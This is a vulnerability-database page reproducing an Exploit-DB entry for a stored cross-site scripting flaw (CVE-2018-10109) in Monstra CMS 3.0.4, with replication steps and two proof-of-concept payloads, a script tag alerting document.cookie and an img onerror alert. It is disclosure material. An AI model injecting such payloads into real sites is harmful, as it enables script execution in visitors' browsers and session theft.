Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Monstra cms 3.0.4 - Persitent Cross-Site Scripting

🗓️ 23 Apr 2018 00:00:00Reported by Wenming JiangType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 35 Views

Monstra CMS 3.0.4 - Stored Cross-Site Scripting vulnerability. Attacker with editor role can insert payload in new page's content section in blog catalog

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Monstra cms 3.0.4 - Persitent Cross-Site Scripting Vulnerability
23 Apr 201800:00
zdt
CNVD		Monstra CMS Cross-Site Scripting Vulnerability (CNVD-2018-08255)
16 Apr 201800:00
cnvd
CVE		CVE-2018-10109
14 Apr 201813:00
cve
Cvelist		CVE-2018-10109
14 Apr 201813:00
cvelist
EUVD		EUVD-2018-2188
7 Oct 202500:30
euvd
exploitpack		Monstra cms 3.0.4 - Persitent Cross-Site Scripting
23 Apr 201800:00
exploitpack
NVD		CVE-2018-10109
16 Apr 201809:58
nvd
OpenVAS		Monstra CMS <= 3.0.4 Multiple Vulnerabilities
29 May 201800:00
openvas
Packet Storm		Monstra CMS 3.0.4 Cross Site Scripting
23 Apr 201800:00
packetstorm
Prion		Cross site scripting
16 Apr 201809:58
prion
Rows per page
# Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting
# Date: 2018-04-14
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE :CVE-2018-10109


#Description:
#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload
#in the content section of a new page in the blog catalog.


#Steps to replicate:
#1. log into the system as an editor role
#2. creat a new page in the blog catalog
#3. navigate to content section
#4. enter payload: <script>alert(document.cookie)</script>
#5. visit http://<your_site>/monstra/blog/<page_name>.php, you will triage JavaScript execution



#Exploit Code:
<script>alert(document.cookie)</script>
or
<img src=1 onerror=alert(/xss/) >

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Apr 2018 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 23.5
CVSS 34.8
EPSS0.00286
monstra cmsstored xsscross-site scriptingeditor rolepayloadblog catalog
35